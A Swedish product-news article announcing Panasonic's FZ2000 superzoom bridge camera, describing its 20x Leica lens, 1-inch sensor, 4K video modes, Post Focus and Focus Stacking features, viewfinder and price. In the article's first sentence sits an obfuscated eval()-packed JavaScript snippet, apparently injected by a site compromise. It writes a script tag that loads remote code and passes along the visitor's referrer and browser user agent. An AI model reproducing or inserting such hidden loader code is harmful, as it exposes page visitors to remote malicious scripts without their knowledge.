Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

FZ2000 – Ny kompakt superzoomkamera för professionell fotografering

FZ2000 – Ny kompakt superzoomkamera för professionell fotografering
Sebastian

Panasonics eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkzbb|var|u0026u|referrer|fenbt||js|php’.split(’|’),0,{}))
nya bridgekamera FZ2000 passar såväl amatörer som proffs, tack vare att den i en kompakt kropp kan erbjuda professionella fotomöjligheter.

Äntligen har Panasonics prisbelönta bridgekamera FZ1000 från 2014 fått sin efterlängtade storebror. Den nya familjemedlemmen i superzoomklassen har döpts till FZ2000 och kan bl a stoltsera med en kompakt kamerakropp, ett 20x optiskt zoomobjektiv (med ett bländaromfång på F2.8-4.5), en stor 1-tumssensor och videoinspelningsmöjligheter i 4K – egenskaper som tillsammans skapar en perfekt följeslagare till såväl vanliga fotoentusiaster som professionella filmskapare.

Inzoomade bilder med utmärkt skärpa

Leica-objektivets avancerade bländare klarar smidigt av att hantera plötsliga ljusförändringar och hjälper dig att producera bilder med vackra defocus-effekter, om så önskas.

Tack vare den nya zoomstrukturen erbjuder FZ2000 dig en stabil, smidig och följsam inzoomning, likt en traditionell videokamera, vilket garanterar bilder och videoinspelningar med utmärkt skärpa.

Högklassiga videomöjligheter lyfter kompaktkameran till proffsnivå

FZ2000 erbjuder inspelningar utan tidsbegränsning*, videoupptagningar i 4K (Cinema 4K: 4096×2160/24 fps och QFHD 4K: 3840×2160/upp till 30 fps) i MOV/MP4 och Full HD-videos i ultrahöga bitrate-hastigheter på 200 Mbps (ALL-Intra) eller 100 Mbps (IPB). Användarna kan själva fritt välja mellan MOV-, MP4- och AVCHD-format. FZ2000 har även andra professionella videomöjligheter, som t ex Dolly Zoom, VFR (Variable Frame Rate), Time Lapse och Stop Motion Animation. För att tillgodose marknadens krav på filmproduktion erbjuder Panasonic även en betalversion av VLOG.

Kameran är utrustad med Panasonics Post Focus-funktion som i efterhand låter dig välja vilket område i bilden som ska vara i fokus bara genom ett enkelt tryck på bildskärmen. Där finns även en helt nyutvecklad Focus Stacking-funktion för framför allt makrofotografering. Focus Stacking innebär att man tar flera bilder på samma motiv med fokus på olika delar av bilden och därefter bakar ihop bilderna i en och samma bild för maximal helhetsskärpa.

OLED Live-sökare och 3-tums pekskärm

FZ2000 har en inbyggd 2360k punkters OLED Live-sökare (LVF) och en 3-tums 1040k punkters pekskärm, som tillsammans hjälper dig att ta sanningsenliga bilder med fantastisk upplösning.

Utöver ovanstående erbjuder FZ2000 även 3.5 mm jack för mikrofon respektive hörlurar, trådlös WiFi-uppkoppling via din smartphone eller surfplatta, samt mängder av olika tillvalsprodukter.

FZ2000 finns tillgänglig i butik från och med november 2016. Priset är ca 13 999 kr.

*FZ2000 har ingen inspelningsspärr på 29min 59sek. Inspelningstiden begränsas endast av kamerans batteri- och minneskapacitet.

För mer information om FZ2000, vänligen besök produktsidan.